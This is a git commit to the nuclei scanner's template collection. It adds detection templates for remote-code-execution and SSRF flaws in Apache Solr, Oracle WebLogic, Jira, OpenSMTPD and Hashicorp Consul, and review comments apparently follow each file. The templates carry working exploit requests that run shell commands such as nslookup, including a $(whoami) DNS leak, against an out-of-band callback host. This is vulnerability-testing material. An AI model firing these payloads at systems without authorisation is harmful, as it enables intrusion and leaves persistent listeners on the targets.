Noam Rathaus 2021-05-05 08:46:32 +03:00
commit a094b38f83
6 changed files with 158 additions and 7 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 302 | vulnerabilities | 144 | exposed-panels | 124 |
| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
| takeovers | 68 | exposures | 91 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1045 files**.
**102 directories, 1049 files**.
</td>
</tr>


@ -0,0 +1,26 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
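Review bot: The first raw request registers a `postCommit` listener named `nuclei` through `add-listener`, and no later request removes it, so a vulnerable host keeps that listener in its Solr config after the scan. The `info` block has no `description:`; one such as `description: Registers a postCommit RunExecutableListener named "nuclei" on vulnerable hosts, which must be removed from the Solr config after testing.` would tell operators what to clean up. The payload also puts `$(whoami)` in front of the interactsh hostname, so the account name of the Solr process ends up in the callback logs, which belongs in the same description. As a style point, `reference: |` makes the two URLs one literal string rather than a list.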


@ -0,0 +1,44 @@
id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference: |
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
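Review bot: The matcher at the end accepts any `dns` interaction although the request body asks the server to open `http://{{interactsh-url}}`, so a bare lookup of that name is weak evidence. A lookup can presumably also come from a proxy or inspection device that resolves hostnames it sees in the body, which would give a false positive. Matching `- "http"` with `part: interactsh_protocol # Confirms the HTTP Interaction`, as the Jira template in this commit does, ties the finding to the fetch itself. The raw request also sends `Content-Type` twice, ends the `User-Agent` and `Accept` values with a stray comma, and fixes `Content-Length: 873` even though the body length changes with the substituted hostname.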


@ -12,11 +12,18 @@ info:
tags: cve,cve2017,atlassian,jira,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "ipinfo.io/missingauth"
part: body
- "http"
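Review bot: The `tags:` line at the top of this hunk is unchanged and still reads `cve,cve2017,atlassian,jira,ssrf`, but the new matcher depends on an interactsh callback, and the other interactsh-based templates in this commit carry `oob`. Anyone selecting or excluding templates by the `oob` tag will get an inconsistent set; `tags: cve,cve2017,atlassian,jira,ssrf,oob` fixes that. The new CVE-2020-7247 template has the same gap in its `tags:` line. The `info` block starts above the hunk, so its other fields were not reviewed.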


@ -0,0 +1,38 @@
id: CVE-2020-7247
info:
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce
network:
- inputs:
- read: 1024
- data: "helo target\r\n"
read: 1024
- data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
read: 1024
- data: "RCPT TO:<root>\r\n"
read: 1024
- data: "DATA\r\n"
read: 1024
- data: "\r\nxxxx\r\n.\r\n"
read: 1024
- data: "QUIT\r\n"
read: 1024
host:
- "{{Hostname}}"
- "{{Hostname}}:25"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: raw
words:
- "Message accepted for delivery"
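Review bot: This template has no `description:`, yet its inputs complete a full SMTP transaction (`RCPT TO:<root>`, `DATA`, a body and the closing `.`), so a host that accepts the sender address gets a message queued for root. A line such as `description: Delivers a real message to root on the target and, on OpenSMTPD 6.4.0 - 6.6.1, triggers an nslookup of the interactsh host.` would tell operators what to expect and what to clean up afterwards. The `interactsh_protocol` matcher also lacks the `# Confirms the DNS Interaction` comment that the other templates in this commit carry.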


@ -0,0 +1,36 @@
id: hashicorp-consul-rce
info:
name: Hashicorp Consul Services Api RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/46074
tags: hashicorp,rce,oob
requests:
- raw:
- | # Create USER
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
{
"ID": "{{randstr}}",
"Name": "{{randstr}}",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"script": "nslookup {{interactsh-url}}",
"interval": "10s",
"Timeout": "86400s"
}
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
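Review bot: The registered service is never removed: the single request in `raw` registers a service whose check runs `nslookup {{interactsh-url}}` with `"interval": "10s"`, so on a host that accepts it the command presumably keeps running every ten seconds after the scan ends. The template should say so in a `description:` (none is present) and, if `{{randstr}}` is stable across requests, follow up with a deregistration request for the same ID. The inline comment `# Create USER` is misleading because the request registers a service; `# Register a service with a script check` describes it. `Content-Length: 205` is fixed although the body contains `{{randstr}}` and `{{interactsh-url}}`, so it is unlikely to match the body actually sent.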